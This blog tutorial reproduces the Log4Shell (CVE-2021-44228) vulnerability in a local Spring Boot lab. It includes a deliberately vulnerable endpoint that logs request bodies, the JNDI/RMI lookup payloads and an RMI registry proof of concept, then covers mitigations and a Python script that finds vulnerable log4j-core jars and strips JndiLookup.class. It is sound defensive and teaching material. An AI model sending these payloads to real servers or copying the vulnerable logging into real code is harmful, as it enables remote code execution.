1. Background
The Log4j bug (CVE-2021-44228, "Log4Shell") has been making a lot of noise these days, so I wanted to find out what it actually is by reproducing it.
2. Build a Spring Boot project that uses Log4j 2
Create a Spring Boot project following the instructions on the Spring website, then edit the POM: exclude the default spring-boot-starter-logging (Logback) from spring-boot-starter-web and add spring-boot-starter-log4j2 instead.
<dependencies>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-web</artifactId>
<exclusions>
<exclusion>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-logging</artifactId>
</exclusion>
</exclusions>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-log4j2</artifactId>
</dependency>
</dependencies>
2.1 Checking the imported dependencies
As you can see, the log4j-core version pulled in by the starter is below 2.15.0. Versions 2.0-beta9 through 2.14.1 are affected, so this setup is enough to trigger the bug.
2.2 Write an ordinary endpoint that accepts external input
package run.runnable.learn;

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestBody;
import org.springframework.web.bind.annotation.ResponseBody;

@SpringBootApplication
@Controller
public class LearnApplication {

    private static final Logger logger = LogManager.getLogger(LearnApplication.class);

    public static void main(String[] args) {
        SpringApplication.run(LearnApplication.class, args);
    }

    // Deliberately vulnerable: the raw request body goes straight into a log message.
    // On log4j-core < 2.15.0, lookups such as ${jndi:...} inside the body are resolved.
    @PostMapping("/hack")
    @ResponseBody
    public String testHackExecute(@RequestBody String content) {
        logger.info("content:{}", content);
        return content;
    }
}
This is a /hack endpoint that simply logs whatever is posted to it and echoes it back. Almost all of us have written code like this, which is one reason the bug is so serious: it is trivial to trigger, because any attacker-controlled string that reaches a log call is enough.
3. Reproducing the bug
3.1 Posting a lookup that prints VM information
Using Postman, POST the body ${java:vm} to /hack. The call returns successfully, and the server's log line shows the JVM description instead of the literal text: Log4j resolved the lookup inside the logged message. (Other built-in java: keys are version, runtime, os, locale and hw.)
3.2 Testing a JNDI lookup over RMI
If it stopped at the above, it would only be an information leak and a few odd log lines. The jndi: lookup is the harmful part: Log4j asks a remote naming service (RMI in this test) for an object and loads whatever comes back.
Let's write a registry using Java's native RMI and bind a service to it:
import java.rmi.AlreadyBoundException;
import java.rmi.RemoteException;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import javax.naming.NamingException;
import javax.naming.Reference;
import com.sun.jndi.rmi.registry.ReferenceWrapper;   // internal JDK class, not exported on JDK 9+

public static void main(String[] args) {
    try {
        LocateRegistry.createRegistry(1099);
        Registry registry = LocateRegistry.getRegistry();
        // Reference(className, factory, factoryLocation): the location is null, so the
        // victim loads HackExecute from its own classpath and its static block runs.
        Reference reference = new Reference("run.runnable.learn.rmi.HackExecute",
                "run.runnable.learn.rmi.HackExecute", null);
        ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
        System.out.println("service started");
        registry.bind("hack", referenceWrapper);
    } catch (RemoteException | NamingException | AlreadyBoundException e) { e.printStackTrace(); }
}
And one more class, whose static initializer runs as soon as the class is loaded:
package run.runnable.learn.rmi;

public class HackExecute {
    // Executes when JNDI instantiates the "factory" class, before any cast can fail.
    static {
        System.out.println("HackExecute: Successful execution.");
    }
}
Start the RMI service above, then use Postman to POST a body of ${jndi:rmi://127.0.0.1:1099/hack} to /hack (the registry from 3.2 listens on port 1099 and bound the name hack).
When the request is logged, the console prints HackExecute's message: Log4j resolved the jndi: lookup, fetched the Reference over RMI and loaded the class, whose static initializer ran.
In this demo HackExecute sits on the application's own classpath (the Reference's factoryLocation is null). In a real attack the factory location points at an attacker-controlled codebase instead, which is how arbitrary code gets run on the target server, and why this is an epic bug. One caveat: since JDK 8u121 the RMI path refuses remote codebases by default (com.sun.jndi.rmi.object.trustURLCodebase=false), which is why most real-world payloads went over LDAP; the lookup itself still fires either way.
4. Emergency remedies
(1) Add the JVM parameter -Dlog4j2.formatMsgNoLookups=true
(2) Set log4j2.formatMsgNoLookups=true in a log4j2.component.properties file on the classpath
(3) Set the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS=true
All three only take effect on log4j-core 2.10 and later, and they were later shown to be an incomplete fix (CVE-2021-45046); the real remedy is upgrading log4j-core. For releases older than 2.10 the alternative is to delete org/apache/logging/log4j/core/lookup/JndiLookup.class from the log4j-core jar.
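The flag-based settings above only help on log4j-core 2.10 and newer, so the first question on any box is which log4j-core versions are deployed and whether they still contain the JndiLookup class. The following added Python script (written for this page, not an official Log4j tool) walks a directory for jars, reads the version from META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties, reports which mitigation applies, and can rewrite a jar without JndiLookup.class, which is what the "zip -q -d" workaround does for releases that do not understand the flag. The jars that demo() scans are tiny constructed stand-ins with the same entry names, not the real library; make_sample_jar and demo are helpers for this example only.

```python
import re
import shutil
import tempfile
import zipfile
from pathlib import Path
from typing import Dict, List, Optional, Tuple

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
FIRST_FIXED = (2, 15, 0)            # first release that fixed CVE-2021-44228
FLAG_SUPPORTED_FROM = (2, 10, 0)    # log4j2.formatMsgNoLookups exists only from 2.10


def parse_version(version: str) -> Tuple[int, int, int]:
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0). Suffixes like -beta9 are dropped."""
    nums: List[int] = []
    for part in version.split("."):
        m = re.match(r"\d+", part)
        if not m:
            break
        nums.append(int(m.group()))
    nums += [0] * (3 - len(nums))
    return nums[0], nums[1], nums[2]


def log4j_core_version(jar: zipfile.ZipFile) -> Optional[str]:
    """Version string from the Maven pom.properties that log4j-core ships, if present."""
    if POM_PROPERTIES not in jar.namelist():
        return None
    for line in jar.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
        if line.startswith("version="):
            return line.split("=", 1)[1].strip()
    return None


def assess_jar(path: Path) -> Optional[Dict[str, object]]:
    """Finding for a jar that is (or bundles) log4j-core, else None."""
    with zipfile.ZipFile(path) as jar:
        version = log4j_core_version(jar)
        has_jndi = JNDI_LOOKUP_CLASS in jar.namelist()
    if version is None and not has_jndi:
        return None
    v = parse_version(version) if version else (0, 0, 0)   # unknown version: assume old
    vulnerable = has_jndi and v < FIRST_FIXED
    if not vulnerable:
        advice = "JndiLookup absent or >= 2.15.0; still upgrade to a current release"
    elif v >= FLAG_SUPPORTED_FROM:
        advice = "upgrade; stopgap: -Dlog4j2.formatMsgNoLookups=true or strip JndiLookup.class"
    else:
        advice = "upgrade; formatMsgNoLookups is ignored before 2.10, strip JndiLookup.class"
    return {"jar": str(path), "version": version, "jndi_lookup_present": has_jndi,
            "vulnerable": vulnerable, "advice": advice}


def scan(root: Path) -> List[Dict[str, object]]:
    """Assess every *.jar under root (sorted so the output is stable)."""
    findings = []
    for jar_path in sorted(root.rglob("*.jar")):
        finding = assess_jar(jar_path)
        if finding:
            findings.append(finding)
    return findings


def strip_jndi_lookup(path: Path) -> bool:
    """Rewrite the jar without JndiLookup.class (what 'zip -q -d' does). True if removed."""
    tmp = path.with_name(path.name + ".tmp")
    with zipfile.ZipFile(path) as src:
        if JNDI_LOOKUP_CLASS not in src.namelist():
            return False
        with zipfile.ZipFile(tmp, "w") as dst:
            for info in src.infolist():
                if info.filename != JNDI_LOOKUP_CLASS:
                    dst.writestr(info, src.read(info))   # keeps each entry's compression
    tmp.replace(path)      # swap in under the original name
    return True


def make_sample_jar(path: Path, version: str, with_jndi: bool = True) -> Path:
    """Constructed stand-in for log4j-core-<version>.jar: same entry names, dummy bytes."""
    path.parent.mkdir(parents=True, exist_ok=True)
    with zipfile.ZipFile(path, "w") as jar:
        jar.writestr(POM_PROPERTIES, "groupId=org.apache.logging.log4j\n"
                     f"artifactId=log4j-core\nversion={version}\n")
        jar.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe")
        if with_jndi:
            jar.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")
    return path


def demo() -> Dict[str, object]:
    """Build fixtures in a temp dir, scan, strip the vulnerable ones, rescan."""
    root = Path(tempfile.mkdtemp(prefix="log4j-scan-"))
    try:
        for version in ("2.14.1", "2.15.0", "2.3"):
            make_sample_jar(root / "lib" / f"log4j-core-{version}.jar", version)
        before = scan(root)
        removed = [strip_jndi_lookup(Path(str(f["jar"]))) for f in before if f["vulnerable"]]
        after = scan(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)
    return {"before": before, "after": after, "removed": removed}


if __name__ == "__main__":
    result = demo()
    for finding in result["before"]:
        print(finding)
    print("stripped:", result["removed"])
    print("still vulnerable:", [f["jar"] for f in result["after"] if f["vulnerable"]])
```

On a real host, point scan() at the application's lib directory (or an unpacked fat jar) instead of the fixtures; stripping the class from a jar still in use requires a restart, and a later upgrade of log4j-core will reintroduce JndiLookup, which is fine for fixed releases but means the scan should be repeated after every dependency change.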
5. Related reading
Apache Log4j has a remote code execution vulnerability: what impact will it have on enterprises, and what else is worth knowing? (Zhihu answer by NLFox)
Apache Logging Services: Log4j 2 Lookups
Important note: risk alert regarding the latest Apache Log4j 2 remote code execution vulnerability
The article was first published on Pineapple’s blog